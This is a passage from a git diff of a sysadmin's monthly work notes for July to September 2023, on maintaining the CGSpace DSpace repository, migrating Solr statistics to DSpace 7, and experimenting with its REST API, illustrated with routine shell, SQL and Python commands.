at it.damore.solr.importexport.BatchCollector.lambda$accumulator$0(BatchCollector.java:71)
at java.base/java.util.stream.ReduceOps$3ReducingSink.accept(ReduceOps.java:169)
at java.base/java.util.Iterator.forEachRemaining(Iterator.java:133)
at java.base/java.util.Spliterators$IteratorSpliterator.forEachRemaining(Spliterators.java:1845)
at java.base/java.util.stream.AbstractPipeline.copyInto(AbstractPipeline.java:509)
at java.base/java.util.stream.AbstractPipeline.wrapAndCopyInto(AbstractPipeline.java:499)
at java.base/java.util.stream.ReduceOps$ReduceOp.evaluateSequential(ReduceOps.java:921)
at java.base/java.util.stream.AbstractPipeline.evaluate(AbstractPipeline.java:234)
at java.base/java.util.stream.ReferencePipeline.collect(ReferencePipeline.java:682)
at it.damore.solr.importexport.App.writeAllDocuments(App.java:252)
at it.damore.solr.importexport.App.main(App.java:150)
```
- Ahhhh, in DSpace 6 this field was a string in the Solr statistics schema, but in DSpace 7 it is an integer...?
- Oh, it seems to be an Atmire change in our DSpace 6... hmmm, so we need to ignore the `workflowItemId` field when exporting
- Upstream: https://github.com/DSpace/DSpace/blob/dspace-6_x/dspace/solr/statistics/conf/schema.xml#L328
- ILRI: https://github.com/ilri/DSpace/blob/6_x-prod/dspace/solr/statistics/conf/schema.xml#L344
- I am wondering if we can skip all these workflow fields since I don't think we are using any aspects of statistics related to workflows
- I diffed our Solr statistics schema with the one from vanilla DSpace 6 and got a list of all the fields that were different:
```
isInternal,workflowItemId,containerCommunity,containerCollection,containerItem,containerBitstream,dateYear,dateYearMonth,filterquery,complete_query,simple_query,complete_query_search,simple_query_search,ngram_query_search,ngram_simplequery_search,text,storage_statistics_type,storage_size,storage_nb_of_bitstreams,name,first_name,last_name,p_communities_id,p_communities_name,p_communities_map,p_group_id,p_group_name,p_group_map,group_id,group_name,group_map,parent_count,bitstreamId,bitstreamCount,actingGroupId,actorMemberGroupId,actingGroupParentId,rangeDescription,range,version_id,file_id,cua_version,core_update_run_nb,orphaned
```
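- A rough sketch of how to get such a list with `xmllint`, assuming the two `schema.xml` files side by side (the vanilla filename is just illustrative, and dynamic fields would need a second pass):
```console
$ xmllint --xpath '//field/@name' dspace/solr/statistics/conf/schema.xml | tr ' ' '\n' | sed -e 's/name="//' -e 's/"$//' -e '/^$/d' | sort > /tmp/fields-ilri.txt
$ xmllint --xpath '//field/@name' schema-vanilla.xml | tr ' ' '\n' | sed -e 's/name="//' -e 's/"$//' -e '/^$/d' | sort > /tmp/fields-vanilla.txt
$ comm -23 /tmp/fields-ilri.txt /tmp/fields-vanilla.txt
```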
- I will combine it with the other fields I was skipping above and try the export again:
```console
$ chrt -b 0 ./run.sh -s http://localhost:8081/solr/statistics -a export -o /tmp/statistics-2020.json -f 'time:[2020-01-01T00\:00\:00Z TO 2020-12-31T23\:59\:59Z]' -k uid -S actingGroupId,actingGroupParentId,actorMemberGroupId,author_mtdt,author_mtdt_search,bitstreamCount,bitstreamId,complete_query,complete_query_search,containerBitstream,containerCollection,containerCommunity,containerItem,core_update_run_nb,countryCode_ngram,countryCode_search,cua_version,dateYear,dateYearMonth,file_id,filterquery,first_name,geoipcountrycode,geoIpCountryCode,group_id,group_map,group_name,ip_ngram,ip_search,isArchived,isInternal,iso_mtdt,iso_mtdt_search,isWithdrawn,last_name,name,ngram_query_search,ngram_simplequery_search,orphaned,parent_count,p_communities_id,p_communities_map,p_communities_name,p_group_id,p_group_map,p_group_name,range,rangeDescription,rangeDescription_ngram,rangeDescription_search,range_ngram,range_search,referrer_ngram,referrer_search,simple_query,simple_query_search,solr_update_time_stamp,storage_nb_of_bitstreams,storage_size,storage_statistics_type,subject_mtdt,subject_mtdt_search,text,userAgent_ngram,userAgent_search,version_id,workflowItemId
```
- Export a list of affiliations from the Initiatives community for Peter:
```console
$ dspace metadata-export -i 10568/115087 -f /tmp/2023-07-28-initiatives.csv
$ csvcut -c 'cg.contributor.affiliation[en_US]' ~/Downloads/2023-07-28-initiatives.csv \
| sed -e 1d -e 's/^"//' -e 's/"$//' -e 's/||/\n/g' -e '/^$/d' \
| sort | uniq -c | sort -hr \
| awk 'BEGIN { FS = "^[[:space:]]+[[:digit:]]+[[:space:]]+" } {print $2}'\
| sed -e '1i cg.contributor.affiliation' -e 's/^\(.*\)$/"\1"/' \
> /tmp/2023-07-28-initiatives-affiliations.csv
```
- This is a method I first used in 2023-01 to export affiliations ONLY used in items in the Initiatives community
- I did the same for authors and investors
## 2023-07-29
- Export CGSpace to look for missing Initiative collection mappings
- I found a bunch of locks waiting for many hours and killed them:
```console
$ psql < locks-age.sql | awk -F"|" '$9 ~ / [[:digit:]][1-9]:[[:digit:]]{2}:[[:digit:]]{2}\./ {print $10}' | sort -u | xargs kill
```
- This looks for a pattern matching something like `11:30:48.598436` in the age column (not 00:00:00) and kills them
- Start a harvest on AReS
<!-- vim: set sw=2 ts=2: -->

266
content/posts/2023-08.md Normal file
View File

@ -0,0 +1,266 @@
---
title: "August, 2023"
date: 2023-08-03T11:18:36+03:00
author: "Alan Orth"
categories: ["Notes"]
---
## 2023-08-03
- I finally got around to working on Peter's cleanups for affiliations, authors, and donors from last week
- I did some minor cleanups myself and applied them to CGSpace
- Start working on some batch uploads for IFPRI
<!--more-->
## 2023-08-04
- Minor cleanups on IFPRI's batch uploads
- I also did a duplicate check and found thirteen items that seem to be duplicates, so I sent them to Leigh to check
- I read this [interesting blog post about PostgreSQL's `log_statement` function](https://www.endpointdev.com/blog/2012/06/logstatement-postgres-all-full-logging/)
- Someone pointed out that this also lets you take advantage of [PgBadger](https://github.com/darold/pgbadger) analysis
- I enabled statement logging on DSpace Test and I will check it in a few days
- Reading about DSpace 7 REST API again
- Here is how to get the first page of 100 items: https://dspace7test.ilri.org/server/api/discover/search/objects?dsoType=item&page=1&size=100
- I really want to benchmark this to see how fast we can get all the pages
- Another thing I notice is that the bitstreams are not here, so that will be an extra call...
## 2023-08-05
- Export CGSpace to check for missing Initiative collection mappings
- Start a harvest on AReS
## 2023-08-07
- I'm checking the PostgreSQL logs now that statement logging has been enabled for a few days on DSpace Test
- I see the logs are about 7 or 8 GB, which is larger than expected—and this is the test server!
- I will now play with pgbadger to see if it gives any useful insights
- Hmm, it seems the `log_statement` advice was outdated, as pgBadger itself says:
> Do not enable log_statement as its log format will not be parsed by pgBadger.
... and:
> Warning: Do not enable both log_min_duration_statement, log_duration and log_statement all together, this will result in wrong counter values. Note that this will also increase drastically the size of your log. log_min_duration_statement should always be preferred.
- So we need to follow pgBadger's own instructions instead to get a suitable log file
- After enabling the new settings I see that our log file is going to be reaallllly big... hmmmm will check tomorrow morning
- More work on the IFPRI batch uploads
## 2023-08-08
- Apply more corrections to authors from Peter on CGSpace
- I finally figured out a `log_line_prefix` for PostgreSQL that works for pgBadger:
```console
log_line_prefix = '%t [%p]: user=%u,db=%d,app=%a,client=%h '
```
- Now I can generate reports:
```console
# /usr/bin/pgbadger -I -q /var/log/postgresql/postgresql-14-main.log -O /srv/www/pgbadger
```
- Ideally we would run this incremental report every day on `postgresql-14-main.log.1` (i.e. yesterday's log file, after it has been rotated)
- Now I have to see how large the file will be...
- I did some final updates to the ninety IFPRI records and uploaded them to DSpace Test first, then to CGSpace
## 2023-08-11
- Fix bug with header background on DSpace 7 on mobile
## 2023-08-12
- Export CGSpace to check for missing Initiative collection mappings
- I deployed the latest OpenRXV master branch with Angular v14 and backend updates on the server
- Start a harvest on AReS
## 2023-08-14
- I ported the DSpace 6.x REST API patch to allow specifying a bundle name when POSTing a bitstream to the legacy REST API in DSpace 7.6
## 2023-08-16
- I noticed that the DSpace statistics pages don't seem to work on communities or collections
- I finally took time to look in the DSpace log file and found this for one:
```console
2023-08-16 14:30:31,873 WARN dace8f96-f034-488e-b38c-9f2eb5d0e002 6cbd0b18-6852-4294-99a5-02dfcab0a469 org.dspace.app.rest.exception.DSpaceApiExceptionControllerAdvice @ Request is invalid or incorrect (status:400 exception: Invalid UUID string: -1 at: java.base/java.util.UUID.fromString1(UUID.java:280))
```
- I'm surprised to see this because those should have been dealt with when we upgraded to DSpace 6
- Looking in the Solr statistics core I see ~1,000,000 documents with the ID `-1`, and about 57,000,000 that don't
- Also interesting, faceting by `dateYear` I see:
- 2023: 209566
- 2022: 403871
- 2021: 336548
- 2020: 31659
- ... none before 2020
- They are all type 5, which is "Site" aka the home page, according to `dspace-api/src/main/java/org/dspace/core/Constants.java`
- Ah hah, and I can see in my DSpace 7 test Solr there are a bunch of hits with `type: 5` that have "-1" of course, but also newer ones that have an actual UUID
- I used the `/server/api/dso/find?uuid=3945ec23-2426-4fce-a2ea-48b38b91547f` endpoint to find out that there is a new `/server/api/core/sites` endpoint listing exactly one site (the home page) with this ID
- So for now I can replace all the "-1" documents with this ID on the test server at least, then I will have to remember to do that during the migration of the production instance
- I did a new export from DSpace 6 using solr-import-export-json with a query limiting it to documents of type 5 and negative 1 ID:
```console
$ chrt -b 0 ./run.sh -s http://localhost:8081/solr/statistics -a export -o /tmp/statistics-fix-uuid.json -f 'id:\-1 AND type:5 AND time:[2020-01-01T00\:00\:00Z TO 2023-12-31T23\:59\:59Z]' -k uid -S actingGroupId,actingGroupParentId,actorMemberGroupId,author_mtdt,author_mtdt_search,bitstreamCount,bitstreamId,complete_query,complete_query_search,containerBitstream,containerCollection,containerCommunity,containerItem,core_update_run_nb,countryCode_ngram,countryCode_search,cua_version,dateYear,dateYearMonth,file_id,filterquery,first_name,geoipcountrycode,geoIpCountryCode,group_id,group_map,group_name,ip_ngram,ip_search,isArchived,isInternal,iso_mtdt,iso_mtdt_search,isWithdrawn,last_name,name,ngram_query_search,ngram_simplequery_search,orphaned,parent_count,p_communities_id,p_communities_map,p_communities_name,p_group_id,p_group_map,p_group_name,range,rangeDescription,rangeDescription_ngram,rangeDescription_search,range_ngram,range_search,referrer_ngram,referrer_search,simple_query,simple_query_search,solr_update_time_stamp,storage_nb_of_bitstreams,storage_size,storage_statistics_type,subject_mtdt,subject_mtdt_search,text,userAgent_ngram,userAgent_search,version_id,workflowItemId
```
- Then I replaced the IDs with the UUID of the site homepage on DSpace 7 Test:
```console
$ sed -i 's/"id":"-1"/"id":"3945ec23-2426-4fce-a2ea-48b38b91547f"/' /tmp/statistics-fix-uuid.json
```
- I re-imported those records and I no longer see the "-1" IDs, but still get the same error in the log
- I don't understand, maybe there is some voodoo, so I rebooted the server
- Hmm, no, it's not a voodoo cache issue, so I really need to debug this:
```console
2023-08-16 15:44:07,122 WARN dace8f96-f034-488e-b38c-9f2eb5d0e002 036b88e6-7548-4852-9646-f345ce3bfcc2 org.dspace.app.rest.exception.DSpaceApiExceptionControllerAdvice @ Request is invalid or incorrect (status:400 exception: Invalid UUID string: -1 at: java.base/java.util.UUID.fromString1(UUID.java:280))
```
- On a related note, I figured out that the root site already has a UUID in DSpace 6, and it's exactly the one above (3945ec23-2426-4fce-a2ea-48b38b91547f)
- I noticed it while looking at the [DSpace 6 REST API's hierarchy page](https://cgspace.cgiar.org/rest/hierarchy)
- So I can update these "-1" IDs with "type:5" in our production I think...
## 2023-08-17
- I decided to update the "-1" IDs in Solr on DSpace 6
- Unfortunately, in Solr there is no way to update only documents matching a query, so we have to export and re-import
- I exported all documents with "type:5" (Homepage) and replaced the ID in the JSON:
```console
$ chrt -b 0 ./run.sh -s http://localhost:8081/solr/statistics -a export -o /tmp/statistics-fix-uuid.json -f 'type:5' -k uid -S actingGroupId,actingGroupParentId,actorMemberGroupId,author_mtdt,author_mtdt_search,bitstreamCount,bitstreamId,complete_query,complete_query_search,containerBitstream,containerCollection,containerCommunity,containerItem,core_update_run_nb,countryCode_ngram,countryCode_search,cua_version,dateYear,dateYearMonth,file_id,filterquery,first_name,geoipcountrycode,geoIpCountryCode,group_id,group_map,group_name,ip_ngram,ip_search,isArchived,isInternal,iso_mtdt,iso_mtdt_search,isWithdrawn,last_name,name,ngram_query_search,ngram_simplequery_search,orphaned,parent_count,p_communities_id,p_communities_map,p_communities_name,p_group_id,p_group_map,p_group_name,range,rangeDescription,rangeDescription_ngram,rangeDescription_search,range_ngram,range_search,referrer_ngram,referrer_search,simple_query,simple_query_search,solr_update_time_stamp,storage_nb_of_bitstreams,storage_size,storage_statistics_type,subject_mtdt,subject_mtdt_search,text,userAgent_ngram,userAgent_search,version_id,workflowItemId
$ sed -i 's/"id":"-1"/"id":"3945ec23-2426-4fce-a2ea-48b38b91547f"/' /tmp/statistics-fix-uuid.json
```
- (Oops, skipping the fields above was not necessary, since I'm importing back into DSpace 6 where those fields exist)
- Then I re-imported:
```
$ ./run.sh -s http://localhost:8081/solr/statistics -a import -o /tmp/statistics-fix-uuid.json -k uid
```
- This worked, but I still see new records coming in that have "id:-1" so I will need to repeat this during the migration.
- I also notice many stats records that have erroneous cities:
- `"city":"com.maxmind.geoip2.record.City [ {} ]"`
- `"city":"com.maxmind.geoip2.record.City [ {\"geoname_id\":1002145,\"names\":{\"de\":\"George\",\"en\":\"George\",\"ru\":\"Джордж\",\"fr\":\"George\",\"ja\":\"ジョージ\"}} ]"`
## 2023-08-18
- Export CGSpace to check for missing Initiative collection mappings
## 2023-08-19
- Start a harvest on AReS
## 2023-08-21
- Experiment with the DSpace 7 REST API
- I wrote a Python script to benchmark harvesting all 100,000+ items using the `/api/discover/search/objects` endpoint 100 items at a time (a rough sketch of the paging logic is below)
- I was able to harvest all 106,000 items in fifty-two minutes, which seems slow, but is about ten times faster than with the legacy REST API...
- Still, I need to benchmark a bit more, as the item response doesn't include collection mappings or thumbnails
- Reading the [API docs](https://github.com/DSpace/RestContract/blob/main/README.md#etags--conditional-headers) it seems that we should be able to use the standard `If-Modified-Since` header for some endpoints
- I tried it on the `/api/discover/search/objects` and `/api/core/items` endpoints, but apparently those don't support this header because I don't see a `Last-Modified` header in the response
- According to the docs, it means that these endpoints indeed don't support it...
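- A minimal sketch of the paging approach, assuming the dspace7test host (the endpoint and the `page`/`size` parameters are from the REST contract, but the exact JSON paths and error handling here are simplified assumptions):
```python
# Sketch: walk all pages of /api/discover/search/objects, 100 items at a time.
import requests

BASE = "https://dspace7test.ilri.org/server/api/discover/search/objects"
page, size, items = 0, 100, []

while True:
    r = requests.get(BASE, params={"dsoType": "item", "page": page, "size": size})
    r.raise_for_status()
    objects = r.json()["_embedded"]["searchResult"]["_embedded"]["objects"]
    if not objects:
        break
    # Each search result embeds the actual item as "indexableObject"
    items.extend(o["_embedded"]["indexableObject"] for o in objects)
    page += 1

print(f"Harvested {len(items)} items")
```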
## 2023-08-22
- I was experimenting with the DSpace 7 REST API again
- This time looking at the thumbnail responses in item endpoints
- According to [the documentation](https://github.com/DSpace/RestContract/blob/main/items.md#main-thumbnail) the API will respond with HTTP 200 if there is a thumbnail, and HTTP 204 if there is no content
- That means we need to make the request before we can even find out!
- Tim on DSpace Slack pointed out the DSpace 7 REST API's [projections](https://github.com/DSpace/RestContract/blob/main/projections.md)
- This means we can embed resources like thumbnail and owningCollection in the item (and other) requests, for example: https://dspace7test.ilri.org/server/api/discover/search/objects?dsoType=item&embed=thumbnail,owningCollection
## 2023-08-23
- I benchmarked the DSpace 7 REST API with the new embeds and it took four hours and seventeen minutes to get all 106,000 items on DSpace 7 Test
- So this is much slower than the results I saw earlier this week, but maybe slightly faster than DSpace 6?
- Maria from Alliance contacted me to say they have agreed to use UN M.49 regions more strictly in TIP, so they want to replace our non-standard "Latin America" region with "Latin America and the Caribbean", "Caribbean" and "Americas" on all Alliance outputs
- I exported their community on CGSpace and fixed the metadata in OpenRefine
- I tried to run `dspace cleanup -v` on CGSpace, but got this error:
```
Caused by: org.postgresql.util.PSQLException: ERROR: update or delete on table "bitstream" violates foreign key constraint "bundle_primary_bitstream_id_fkey" on table "bundle"
Detail: Key (uuid)=(61bff7da-c8e3-420f-841c-ec5e8238d716) is still referenced from table "bundle".
```
- The solution, as always, is to delete those IDs manually in PostgreSQL:
```
$ psql -d dspace -c "UPDATE bundle SET primary_bitstream_id=NULL WHERE primary_bitstream_id IN ('61bff7da-c8e3-420f-841c-ec5e8238d716');"
UPDATE 1
```
- I also tried to delete all users who haven't logged in since 2017 using the groomer script, but it crashes due to those users still having items or workflows or whatever:
```console
$ dspace dsrun org.dspace.eperson.Groomer -a -b 08/23/2017 -d
```
- I see that it is now [possible in DSpace 7 to delete such users](https://github.com/DSpace/DSpace/pull/2229) so we will have to wait
## 2023-08-24
- I spent some time trying to get themes to extend in DSpace 7
- I finally got a basic ILRI theme working, but there is a bug that causes theme components to get duplicated
## 2023-08-25
- Meeting with Altmetric about the next phase of their integration with CGSpace
- A bit of cleanup on CGSpace metadata
- I fixed DOIs, licenses, dates, subjects, affiliations, titles, publishers, types, and titles in 1,240 items
## 2023-08-26
- A few weeks ago we received a request from the Fruits and Vegetables Initiative saying that they've gotten approval to begin using the long name instead of the short one everywhere, apparently for SEO reasons
- After communicating with PRMS and other teams working on systems using this metadata I finally updated them in CGSpace
- Export CGSpace to check for missing Initiative collection mappings
- Start a harvest on AReS
- I fixed ~200 titles with new lines, excessive whitespace, and Unicode FFFD characters
- There are many more with 00A0, 200B, etc, but those need more careful inspection
## 2023-08-28
- Day one of CGSpace partners meeting in Addis
- Oh this is a game changer, I just realized that we can use Solr query syntax in the DSpace 7 REST API, so we can do this for example:
```
https://dspace7test.ilri.org/server/api/discover/search/objects?query=lastModified%3A%5B2023-08-01T00%3A00%3A00Z%20TO%20%2A%5D
```
- Which is this query: `lastModified:[2023-08-01T00:00:00Z TO *]`
- The queries need to be URL encoded of course
- Oh nice, and we can do the same for accession date:
```
https://dspace7test.ilri.org/server/api/discover/search/objects?query=dc.date.accessioned_dt%3A%5B2023-08-01T00%3A00%3A00Z%20TO%20%2A%5D
```
- That is this query: `dc.date.accessioned_dt:[2023-08-01T00:00:00Z TO *]`
- We need to use the dt version of the accession date because that is the one that has a date type
- This query gives 290 results, which should be the items submitted in August!
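- For building such queries programmatically, standard URL encoding is enough; a tiny sketch (the host is ours, the rest is plain `urllib`):
```python
# Sketch: URL-encode a Solr-syntax query for the discover search endpoint.
from urllib.parse import urlencode

query = "dc.date.accessioned_dt:[2023-08-01T00:00:00Z TO *]"
url = (
    "https://dspace7test.ilri.org/server/api/discover/search/objects?"
    + urlencode({"query": query})
)
print(url)
```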
## 2023-08-29
- Day two of CGSpace partners meeting in Addis
## 2023-08-30
- Day three of CGSpace partners meeting in Addis
- I did a lot of work on the CGSpace Angular theme for DSpace 7
- Many changes to Discovery filters and search results
## 2023-08-31
- Day four of CGSpace partners meeting in Addis
- I removed the old Bioversity and CIAT subjects from Discovery facets on CGSpace
- Maria and Leroy said they are no longer using them so we don't need to keep indexing and displaying them
- I did a lot of work on the CGSpace Angular theme for DSpace 7
- Now we have clickable keywords that go to Discovery instead of browse, as well as some new icons
- We don't need to use the clunky browse links to get clickable links any more so I will disable those
<!-- vim: set sw=2 ts=2: -->

243
content/posts/2023-09.md Normal file
View File

@ -0,0 +1,243 @@
---
title: "September, 2023"
date: 2023-09-02T17:29:36+03:00
author: "Alan Orth"
categories: ["Notes"]
---
## 2023-09-02
- Export CGSpace to check for missing Initiative collection mappings
- Start a harvest on AReS
<!--more-->
## 2023-09-03
- I figured out how to use Altmetric and Dimensions badges in the DSpace Angular frontend
- It still feels hacky, but using [AfterViewInit](https://stackoverflow.com/questions/41936631/how-to-trigger-the-function-after-dom-markup-is-loaded-in-angular-style-applicat), and importing the Altmetric `embed.js` in the component works
- The style on mobile also needs work...
## 2023-09-06
- Discussion with Marie about finalizing the output types list on GitHub
- I did some review and cleanup in preparation for publishing the new list
## 2023-09-07
- Export CGSpace to start doing a review of the metadata
- First I will start by extracting all items with DOIs, along with some fields I can compare against Crossref:
```console
$ csvgrep -c 'cg.identifier.doi[en_US]' -r 'doi.org' ~/Downloads/2023-09-07-cgspace.csv \
| csvcut -c 'id,dc.title[en_US],dcterms.issued[en_US],dcterms.available[en_US],cg.issn[en_US],cg.isbn[en_US],cg.volume[en_US],cg.issue[en_US],cg.number[en_US],dcterms.extent[en_US],cg.identifier.doi[en_US],cg.reviewStatus[en_US],cg.isijournal[en_US],dcterms.license[en_US],dcterms.accessRights[en_US],dcterms.type[en_US],dc.identifier.uri[en_US]' \
> /tmp/2023-09-07-cgspace-dois.csv
$ csvgrep -c 'cg.identifier.doi[en_US]' -r 'doi.org' ~/Downloads/2023-09-07-cgspace.csv | csvcut -c 'cg.identifier.doi[en_US]' | sed 1d > /tmp/2023-09-07-cgspace-dois.txt
```
- Then I resolved the DOIs from Crossref:
```console
$ ./ilri/crossref_doi_lookup.py -i /tmp/2023-09-07-cgspace-dois.txt -o /tmp/2023-09-07-cgspace-dois-results.csv -e a.orth@cgiar.org
```
- A user emailed to ask about uploading a 180MB PDF to CGSpace
- I used GhostScript to try reducing it using the `screen`, `ebook` and `prepress` presets:
```console
$ gs -sDEVICE=pdfwrite -dCompatibilityLevel=1.4 -dPDFSETTINGS=/screen -dNOPAUSE -dQUIET -dBATCH -sOutputFile=primer-screen.pdf Primer\ \(digital\)_Climate-\ smart\ and\ regenerative\ agriculture\ in\ climate\ change\ adaptation.pdf
$ gs -sDEVICE=pdfwrite -dCompatibilityLevel=1.4 -dPDFSETTINGS=/ebook -dNOPAUSE -dQUIET -dBATCH -sOutputFile=primer-ebook.pdf Primer\ \(digital\)_Climate-\ smart\ and\ regenerative\ agriculture\ in\ climate\ change\ adaptation.pdf
$ gs -sDEVICE=pdfwrite -dCompatibilityLevel=1.4 -dPDFSETTINGS=/prepress -dNOPAUSE -dQUIET -dBATCH -sOutputFile=primer-prepress.pdf Primer\ \(digital\)_Climate-\ smart\ and\ regenerative\ agriculture\ in\ climate\ change\ adaptation.pdf
```
- The `prepress` one is 300DPI and looks visually identical to the original, so I proposed that we use that one
## 2023-09-08
- I did a review of the metadata for our items with DOIs, comparing with data from Crossref
- I spot checked a handful of issue / online dates and licenses, and saw that Crossref's dates are always more accurate than ours when they differ
- I also filled in some missing volumes, issues, ISSNs, and extents
- This results in 14,000 changes to existing items, which will take several days to import unfortunately
- After eight hours the first file is only about 2/3 finished... sigh
- Meet with Peter to discuss changes to the DSpace 7 test
- Minor updates to submission forms and some new ideas for the home page and item page
- I figured out how to use a themed home page component and add a cards UI to our CGSpace theme
## 2023-09-09
- I can't believe that almost 18 hours later the first CSV import with 5,000 changes is not done...
- Run all system updates on CGSpace and reboot it, as it had been two months since the last time
## 2023-09-10
- Minor work on the DSpace 7 home page
## 2023-09-11
- Export CGSpace to check for missing Initiative collection mappings
- Start a harvest on AReS
## 2023-09-12
- Minor work on DSpace 7 home page
- Minor work on CG Core types
- I published a new HTML version of the updated IPtypes and archived the current version as v2.0.0 so we can still reference it
## 2023-09-13
- Stefano reminded me about the updated OAI MODS mappings on CGSpace so I re-applied them on DSpace Test and updated the OAI index so he could confirm
- Now I'm ready to put it on CGSpace if he confirms
- I created a basic theme for CIP on DSpace 7
- While doing that I noticed that a bunch of CIP bitstreams didn't have the latest 500px thumbnails so I re-ran filter-media on a handful of their collections
- I had two occurrences of an OOM kill of the Tomcat 9 java process on DSpace 7 test tonight
- Once while doing a Discovery index, the other while doing filter media
## 2023-09-15
- Discuss issues with the Altmetric API with the Altmetric support team
- Apparently we can use a different API, the [Explorer API](https://www.altmetric.com/explorer/documentation/api), since we already have access to the Explorer dashboard
- I reduced the Solr heap size on DSpace 7 from 3GB to 2GB
- Apparently I already did this from 4GB to 3GB a few months ago
- The Solr admin interface was showing Solr taking ~1GB of RAM so I think this should be safe
- Mark on DSpace Slack said he uses PM2's `--max-memory-restart` so the processes restart when they hit the limit
- Also, he said he had to reduce `cache:serverSide:botCache:max` from 1000 to 500 to cache less SSR pages in memory
- I decided to try deploying DSpace 7 Test on a Hetzner server with 64GB RAM, 6 CPUs, and 2x512GB NVMe SSD
## 2023-09-16
- Export CGSpace to check for missing Initiative collection mappings
- Start a harvest on AReS
- Configure the privacy policy page on DSpace 7 using a themed component with the text from our DSpace 6 site
- I realized that for all my custom Angular components I should be using `routerLink` instead of `href` when I am constructing links
- The `routerLink` routes within the single page application and saves state, while the `href` reloads the page
- Using the `routerLink` way is faster and results in less flashing and jumping in the page when navigating
- See: https://stackoverflow.com/a/61588147
## 2023-09-17
- I added an About page to DSpace 7 Test using similar logic to the privacy page
## 2023-09-18
- I filed a GitHub issue for being unable to navigate dropdown lists using the keyboard on the dspace-angular submission form: https://github.com/DSpace/dspace-angular/issues/2500
- I filed a GitHub issue for the search filters capitalizing metadata values: https://github.com/DSpace/dspace-angular/issues/2501
## 2023-09-19
- Complete migration of DSpace 7 Test from Linode to Hetzner
- Export some years of Solr stats from CGSpace to import on the new DSpace 7 Test:
```console
$ chrt -b 0 ./run.sh -s http://localhost:8081/solr/statistics -a export -o /tmp/statistics-2020-2022.json -f 'time:[2020-01-01T00\:00\:00Z TO 2022-12-31T23\:59\:59Z]' -k uid -S actingGroupId,actingGroupParentId,actorMemberGroupId,author_mtdt,author_mtdt_search,bitstreamCount,bitstreamId,complete_query,complete_query_search,containerBitstream,containerCollection,containerCommunity,containerItem,core_update_run_nb,countryCode_ngram,countryCode_search,cua_version,dateYear,dateYearMonth,file_id,filterquery,first_name,geoipcountrycode,geoIpCountryCode,group_id,group_map,group_name,ip_ngram,ip_search,isArchived,isInternal,iso_mtdt,iso_mtdt_search,isWithdrawn,last_name,name,ngram_query_search,ngram_simplequery_search,orphaned,parent_count,p_communities_id,p_communities_map,p_communities_name,p_group_id,p_group_map,p_group_name,range,rangeDescription,rangeDescription_ngram,rangeDescription_search,range_ngram,range_search,referrer_ngram,referrer_search,simple_query,simple_query_search,solr_update_time_stamp,storage_nb_of_bitstreams,storage_size,storage_statistics_type,subject_mtdt,subject_mtdt_search,text,userAgent_ngram,userAgent_search,version_id,workflowItemId
```
- Ben sent me an export of ILRI presentations from Slideshare and asked if we could see if any are missing on CGSpace
- First I exported CGSpace and extracted the `cg.identifier.url` column so I could normalize all Slideshare URLs to use "https://www.slideshare.net" instead of localized variants (es.slideshare.net, fr.slideshare.net, etc), non-https links, and links with query params or trailing slashes (a rough sketch of this normalization is below)
- This was about 250 URLs
- I extracted the URL field from both our list and the Slideshare list and then used [GNU `join` to print non-matched lines](https://unix.stackexchange.com/questions/274548/join-two-files-each-with-two-columns-including-non-matching-lines):
```console
$ join -t, -v 2 -11 -21 -o auto /tmp/cgspace-ilri-slideshare-sorted-only-urls-sorted.csv /tmp/ilri-slideshare-sorted-sorted.csv | wc -l
542
```
- It's important to note that you must use GNU `sort` on the files first, as I had tried sorting in vim and it didn't satisfy `join`
- So it seems there are 542 Slideshare presentations we are missing
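- A sketch of the kind of URL normalization described above (the exact rules I applied in OpenRefine may have differed slightly, and the example URL is made up):
```python
# Sketch: normalize Slideshare URLs to a canonical https://www.slideshare.net form,
# dropping localized subdomains, query strings, and trailing slashes.
import re

def normalize(url):
    url = url.strip()
    url = re.sub(r"^http://", "https://", url)
    url = re.sub(r"^https://[a-z]{2}\.slideshare\.net", "https://www.slideshare.net", url)
    url = re.sub(r"^https://slideshare\.net", "https://www.slideshare.net", url)
    return url.split("?")[0].rstrip("/")

print(normalize("http://es.slideshare.net/ILRI/example-presentation/?ref=x"))
# -> https://www.slideshare.net/ILRI/example-presentation
```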
## 2023-09-20
- Regarding the incorrect city in Solr statistics, I see we have 1,600,000 of them
- Before filing a GitHub issue, I want to check if they maybe come from an Atmire module, as I see them clustered around two particular CUA versions:
```json
{
  "responseHeader": {
    "status": 0,
    "QTime": 2760,
    "params": {
      "q": "city:com.maxmind.geoip2.record.City*",
      "facet.field": "cua_version",
      "indent": "true",
      "rows": "0",
      "wt": "json",
      "facet": "true",
      "_": "1695192301927"
    }
  },
  "response": {
    "numFound": 1661863,
    "start": 0,
    "docs": []
  },
  "facet_counts": {
    "facet_queries": {},
    "facet_fields": {
      "cua_version": [
        "6.x-4.1.10-ilri-RC7",
        1112186,
        "6.x-4.1.10-ilri-RC5",
        451180,
        "6.x-4.1.10-ilri-RC9",
        0
      ]
    },
    "facet_dates": {},
    "facet_ranges": {},
    "facet_intervals": {}
  }
}
```
- I migrated AReS from Linode to Hetzner
- I asked on Slack and someone told me that we need to edit `src/app/menu.resolver.ts` to add new drop down menus to the top navbar
- It works, though it is unfortunate that we can't do it in a theme
## 2023-09-21
- More minor work on DSpace 7 home page and menus
- Meeting to discuss types and DSpace 7 migration plans
- Create a DSpace 7 theme for IITA
## 2023-09-22
- Create a DSpace 7 theme for IWMI
- I had some issues with pm2 on the new DSpace 7 Test
- It seems to be due to mixing systemd-managed startup with manual starting and stopping...
- After reading the discussion in [this pm2 issue](https://github.com/Unitech/pm2/issues/2914) I realize that we probably need to use `--no-daemon` to have systemd fully manage the processes without pm2 trying to save state
## 2023-09-23
- Export CGSpace to check for missing Initiative collection mappings
- Start a harvest on AReS
## 2023-09-25
- CGSpace metadata and community / collection cleanup
- Review some patches on DSpace Angular
- Create a basic Alliance theme for DSpace 7
## 2023-09-27
- I realized that we can get controlled vocabularies from DSpace 7's REST API, for both value-pairs and hierarchical controlled vocabularies, ie: https://dspace7test.ilri.org/server/api/submission/vocabularies/common_iso_languages/entries
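- A quick sketch of pulling the entries from that endpoint (the `size` parameter and the embedded `entries` key are assumptions based on the usual DSpace 7 REST conventions):
```python
# Sketch: fetch entries from a DSpace 7 submission vocabulary.
import requests

URL = "https://dspace7test.ilri.org/server/api/submission/vocabularies/common_iso_languages/entries"

r = requests.get(URL, params={"size": 100})
r.raise_for_status()
for entry in r.json()["_embedded"]["entries"]:
    print(entry.get("value"), entry.get("display"))
```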
## 2023-09-29
- Meeting with Aditi and others to discuss plan for using CGSpace to do a systematic review of CGIAR research on climate change
- I cleaned up metadata for a hundred or so items, and realized we will need to do more to make sure abstracts and open access status are correct since there will be a laser focus on the metadata
